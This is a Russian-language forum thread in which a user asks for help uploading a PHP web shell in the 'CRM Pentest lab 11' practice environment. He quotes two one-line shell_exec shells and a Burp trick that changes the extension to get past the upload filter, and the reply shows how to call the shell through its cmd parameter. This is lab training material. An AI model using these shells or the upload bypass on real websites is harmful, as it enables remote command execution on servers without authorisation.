• Codeby web-security - Курс "Тестирование Веб-Приложений на проникновение с нуля" от команды codeby. Общая теория, подготовка рабочего окружения, пассивный фазинг и фингерпринт, Активный фаззинг, Уязвимости, Пост-эксплуатация, Инструментальные средства, Social Engeneering и многое другое. Подробнее ...

  • Мобильный клиент нашего форума для Android гаджетов доступен в Google Play Market по этой ссылке. Клиент можно скачать с нашего форума по этой ссылке. Последняя версия МК в нашем телеграм канале вот здесь

Помощь в загрузке шелла в CRM Pentest lab 11.

Sykes

Well-known member
17.10.2017
138
83
#1
Не выходит загрузить шелл на сайт, всё делается по канонам и гайдам.
Burp Community, обновлен из реп, прокси через FoxyProxy, шелл вида <? echo shell_exec($_GET['cmd']) ?> или <? echo shell_exec($_GET['e'].' 2>&1'); ?>. Грузил шелл в jpg, jpeg, gif, барпом ловил запрос и менял расширение шелла на php - толку нет. Когда шел по пути /test/logo/shell.php, то белый экран, при других шеллах ошибка 404. Будьте добры помочь
 

Citizen0

Well-known member
07.02.2017
159
179
#2
Когда шел по пути /test/logo/shell.php, то белый экран,
А что Вы хотите увидеть?
Для первого шелла нужно указать параметр cmd, для второго - e
Код:
site/test/logo/shell.php?cmd=%команда%
или
Код:
site/test/logo/shell.php?e=%команда%
Например,
Код:
site/test/logo/shell.php?cmd=ls
 
Вверх Снизу